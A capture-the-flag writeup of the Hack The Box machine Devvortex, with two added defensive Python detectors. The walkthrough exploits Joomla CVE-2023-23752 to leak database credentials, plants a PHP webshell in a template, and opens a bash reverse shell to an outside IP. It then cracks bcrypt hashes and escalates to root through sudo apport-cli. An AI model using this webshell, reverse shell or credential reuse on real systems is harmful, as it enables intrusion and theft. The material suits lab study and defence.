Eur3ka's Studio.

Devvortex

2025/09/15

A rare bit of free time in a busy stretch. This is a practice-box writeup, and I learned about a CMS architecture I don't see very often.

Recon

There is not much worth paying attention to among the open ports; once again the web service on port 80 is the starting point.

❯ nmap -sCV -p22,80 10.10.11.242
Starting Nmap 7.98 ( https://nmap.org ) at 2025-09-15 23:38 +0800
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.34s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds

After opening the web service I could not find a suitable attack surface, and the input box at the bottom gave no leads either. The next step followed the approach HTB suggests: look for subdomains. Learned something there too.

❯ proxychains ffuf -w subdomains-1000.txt -u http://10.10.11.242 -H 'Host: FUZZ.devvortex.htb'
[proxychains] config file found: /Users/joe/proxychains-ng/proxychains.conf
[proxychains] preloading /Users/joe/proxychains-ng/libproxychains4.dylib
[proxychains] DLL init: proxychains-ng 4.17-git-4-gce07eaa

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.10.11.242
:: Wordlist : FUZZ: /Users/joe/Documents/Red/SecDictionary/Subdomain_List/subdomains-1000.txt
:: Header : Host: FUZZ.devvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 601ms]

Found a subdomain starting with dev; add it to the hosts file so it can be reached.

10.10.11.242 devvortex.htb dev.devvortex.htb

After reaching it, neither the footer nor the page source said which framework was in use (at least I could not find it), so I ran CmsVulScan to fingerprint the framework.

❯ python3 CmsVulScan.py -u http://dev.devvortex.htb

_____ _ __ ______
/ ___/_ _ __| | / /_ __/ / __/______ ____
/ /__/ ' \(_-< |/ / // / /\ \/ __/ _ `/ _ \
\___/_/_/_/___/___/\_,_/_/___/\__/\_,_/_//_/



[00:22:07] [*] Check whether the payload file exists
[00:22:07] [*] All Payload 18780 duplicate removal 6935
[00:22:07] [+] Payload load the success
[00:22:07] [*] CMS recognition of http://dev.devvortex.htb in progress
[00:22:07] [*] Scanning by MD5 mode......
[00:24:17] [*] MD5: 3725/3725
[00:24:17] [*] Scanning by RE mode......
[00:24:19] [*] RE: 49/2868
[00:24:19] [+] Using RE to discover the CMS in path /administrator/components/com_login/login.xml: Joomla(逐浪)

It is indeed Joomla. Next, get the version. Visiting /administrator directly shows no version information in the footer either, so let's check with msfconsole.

msf > search joomla
14 auxiliary/scanner/http/joomla_version
msf > use auxiliary/scanner/http/joomla_version
msf auxiliary(scanner/http/joomla_version) > set rhosts http://dev.devvortex.htb/
rhosts => http://dev.devvortex.htb/
msf auxiliary(scanner/http/joomla_version) > run
[*] Server: nginx/1.18.0 (Ubuntu)
[+] Joomla version: 4.2.6
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Got it: this Joomla version is 4.2.6.

Shell as logan

CVE-2023-23752

Now that the framework is known, search for vulnerabilities in it. There is nothing listed for 4.2.6 exactly, but there is one for the slightly higher 4.2.8, so let's give it a try.

┌──(kali㉿kali)-[~]
└─$ searchsploit joomla | grep 4.2
Joomla! v4.2.8 - Unauthenticated information disclosure | php/webapps/51334.py
┌──(kali㉿kali)-[~]
└─$ searchsploit -x php/webapps/51334.py

#!/usr/bin/env ruby

# Exploit
## Title: Joomla! v4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)

It turns out the vulnerability applies across 4.0.0 to 4.2.8, so let's go at it with msfconsole.

msf > use cve:2023-23752
msf auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts http://dev.devvortex.htb/
rhosts => http://dev.devvortex.htb/
msf auxiliary(scanner/http/joomla_api_improper_access_checks) > run
[+] Users JSON saved to /Users/joe/.msf4/loot/20250916125947_default_10.10.11.242_joomla.users_856850.bin
[+] Joomla Users
============

ID   Super User  Name        Username  Email                Send Email  Register Date        Last Visit Date      Group Names
---  ----------  ----------  --------  -------------------  ----------  -------------------  -------------------  -----------
649  *           lewis       lewis     lewis@devvortex.htb  1           2023-09-25 16:44:24  2023-10-29 16:18:50  Super Users
650              logan paul  logan     logan@devvortex.htb  0           2023-09-26 19:15:42                       Registered

[+] Config JSON saved to /Users/joe/.msf4/loot/20250916125948_default_10.10.11.242_joomla.config_972795.bin
[+] Joomla Config
=============

Setting Value
------- -----
db encryption 0
db host localhost
db name joomla
db password P4ntherg0t1n5r3c0n##
db prefix sd4fg_
db user lewis
dbtype mysqli

The exploit goes through and retrieves the information, although for some reason it was still followed by a string of errors. Trying to connect to the database directly did not work; remote connections are probably not enabled. Fortunately the credentials can be reused to log in.
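From the defender's side, the requests the Metasploit module sends above are easy to spot in nginx access logs: CVE-2023-23752 is an unauthenticated read of the Joomla 4 web-services API (v1/config/application leaks the database credentials, v1/users the account list) when the request carries public=true. The detector below is an added example, not code from the original post; the log lines are constructed, and the server is assumed to use nginx's default "combined" log format.

```python
import re

# Default nginx "combined" access-log format (the target runs nginx 1.18.0).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# CVE-2023-23752: the Joomla 4 API answers these routes without a token
# when the query string contains public=true.
SENSITIVE_API = re.compile(r'^/api/index\.php/v1/(config/application|users)\b')
PUBLIC_FLAG = re.compile(r'[?&]public=true\b', re.IGNORECASE)


def is_cve_2023_23752_attempt(path: str) -> bool:
    """True when the request path targets a leaking route with public=true."""
    return bool(SENSITIVE_API.match(path)) and bool(PUBLIC_FLAG.search(path))


def flag_requests(lines) -> list:
    """Return one record per matching request, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line, skip it
        if is_cve_2023_23752_attempt(m['path']):
            hits.append({
                'ip': m['ip'],
                'path': m['path'],
                'status': int(m['status']),
                # 200 means the API answered, i.e. the data actually left the box;
                # a 403 is a blocked attempt (patched Joomla or a WAF rule)
                'succeeded': m['status'] == '200',
            })
    return hits


# Constructed sample lines, not a real capture.
SAMPLE_LOG = """\
10.10.16.2 - - [16/Sep/2025:12:59:47 +0800] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 1311 "-" "Mozilla/5.0"
10.10.16.2 - - [16/Sep/2025:12:59:48 +0800] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
10.10.14.7 - - [16/Sep/2025:13:02:11 +0800] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 0 "-" "curl/8.0"
10.10.14.9 - - [16/Sep/2025:13:05:00 +0800] "GET /index.php/component/content/?public=true HTTP/1.1" 200 23221 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == '__main__':
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

A successful hit against config/application should be treated as a credential leak: rotate the database password and any site accounts whose passwords reuse it, exactly the reuse this box relies on.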

Modifying Templates

Once inside, there is probably no further one-shot CVE to use. After reading up on the Joomla framework, I found that under System/Templates/Site Templates the template files can be edited, and the changes take effect immediately. So let's see whether we can add something to one of them.

<?php

/**
* @package Joomla.Site
* @subpackage Templates.cassiopeia
*
* @copyright (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/

defined('_JEXEC') or die;

if (isset($_REQUEST['hack'])){
system($_REQUEST['hack']);
die();
}
...

We could not modify index.php because of permissions, but error.php slipped through the net; after editing it, pop a shell.
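Because template edits made through the admin panel land on disk immediately, a defender's simplest check for the backdoor shown above is a static scan of the templates directory for a command-execution sink fed directly from a request superglobal. The scanner below is an added example, not code from the original post or from Joomla; the two template files it scans are constructed in a temporary directory, and the line-based pattern is a heuristic (a value copied into a variable first would not be caught).

```python
import re
import tempfile
from pathlib import Path

# PHP functions that execute commands or code, and the request superglobals
# that should never reach them directly.
EXEC_SINKS = r'(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)'
REQUEST_SOURCES = r'\$_(?:REQUEST|GET|POST|COOKIE)\b'
SINK_WITH_REQUEST_ARG = re.compile(EXEC_SINKS + r'\s*\(\s*' + REQUEST_SOURCES)


def scan_php_source(src: str) -> list:
    """Return (line number, stripped line) for every suspicious line."""
    return [(n, line.strip())
            for n, line in enumerate(src.splitlines(), 1)
            if SINK_WITH_REQUEST_ARG.search(line)]


def scan_templates(root: Path) -> dict:
    """Walk a Joomla templates tree and map each flagged file to its findings."""
    results = {}
    for php in sorted(root.rglob('*.php')):
        findings = scan_php_source(php.read_text(errors='replace'))
        if findings:
            results[php.relative_to(root).as_posix()] = findings
    return results


# Constructed samples: the backdoored error.php from the page and a clean index.php.
SAMPLE_ERROR_PHP = """<?php
defined('_JEXEC') or die;
if (isset($_REQUEST['hack'])){
system($_REQUEST['hack']);
die();
}
"""
SAMPLE_INDEX_PHP = """<?php
defined('_JEXEC') or die;
$app = Factory::getApplication();
echo $this->params->get('siteTitle');
"""


def demo() -> dict:
    """Build a throwaway templates tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / 'templates'
        (root / 'cassiopeia').mkdir(parents=True)
        (root / 'cassiopeia' / 'error.php').write_text(SAMPLE_ERROR_PHP)
        (root / 'cassiopeia' / 'index.php').write_text(SAMPLE_INDEX_PHP)
        return scan_templates(root)


if __name__ == '__main__':
    print(demo())
```

Run it against a real install as a cron job, and pair it with a checksum baseline of the shipped template files so that any edit, not just this pattern, raises an alert.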

http://dev.devvortex.htb/hack?hack=bash -c "bash -i >%26 /dev/tcp/10.10.16.2/4444 0>%261"

❯ nc -lvn 4444
bash: cannot set terminal process group (871): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<tb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@devvortex:~/dev.devvortex.htb$
// after connecting, use python to upgrade the shell

Hashcat

After connecting, only the logan user exists under /home. Trying the earlier lewis/P4ntherg0t1n5r3c0n## credentials over ssh did not work. Then I remembered the database had not been connected to yet, so I tried connecting with mysql.

www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla
<htb$ mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla
...
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

OK, connected successfully. No need to enable remote connections; just work from the terminal directly.

mysql> describe sd4fg_users;
+---------------+---------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+---------------+------+-----+---------+----------------+
| id | int | NO | PRI | NULL | auto_increment |
| name | varchar(400) | NO | MUL | | |
| username | varchar(150) | NO | UNI | | |
| email | varchar(100) | NO | MUL | | |
| password | varchar(100) | NO | | | |
| block | tinyint | NO | MUL | 0 | |
| sendEmail | tinyint | YES | | 0 | |
| registerDate | datetime | NO | | NULL | |
| lastvisitDate | datetime | YES | | NULL | |
| activation | varchar(100) | NO | | | |
| params | text | NO | | NULL | |
| lastResetTime | datetime | YES | | NULL | |
| resetCount | int | NO | | 0 | |
| otpKey | varchar(1000) | NO | | | |
| otep | varchar(1000) | NO | | | |
| requireReset | tinyint | NO | | 0 | |
| authProvider | varchar(100) | NO | | | |
+---------------+---------------+------+-----+---------+----------------+
17 rows in set (0.01 sec)

mysql> select name,username,password from sd4fg_users;
+------------+----------+--------------------------------------------------------------+
| name | username | password |
+------------+----------+--------------------------------------------------------------+
| lewis | lewis | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan paul | logan | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+------------+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)

The logan paul record is the interesting one; it should be reusable for ssh. The priority now is cracking the hash.

❯ hashcat logan ../Documents/Red/SecDictionary/PasswordDic/弱口令字典/rockyou-top15000.txt --user -m 3200
···
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho

Of course, going the other way and cracking lewis's password works too.

❯ cat sqlpass
P4ntherg0t1n5r3c0n##
❯ hashcat logan sqlpass --user -m 3200
...
$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u:P4ntherg0t1n5r3c0n##

OK, so log in over ssh as logan:tequieromucho and grab user.txt.

❯ ssh logan@10.10.11.242
...
logan@devvortex:~$ cat /home/logan/user.txt
7255c0f90e316ba7041e99fa4732413c

Shell as root

After running sudo -l, I found a SUID privilege-escalation path, which can be exploited with CVE-2023-1326.

logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli

apport handles crashed programs; if there is no crash file yet, create one first.

logan@devvortex:/var/crash$ sleep 20 &
[1] 2761
logan@devvortex:/var/crash$ kill -ABRT 2761
logan@devvortex:/var/crash$ ls
_usr_bin_sleep.1000.crash
[1]+ Aborted (core dumped) sleep 20

Once we have the crash file, we can do the SUID escalation.

logan@devvortex: sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
press V (view report)
!/bin/bash  (type it directly; ignore whatever the screen shows)
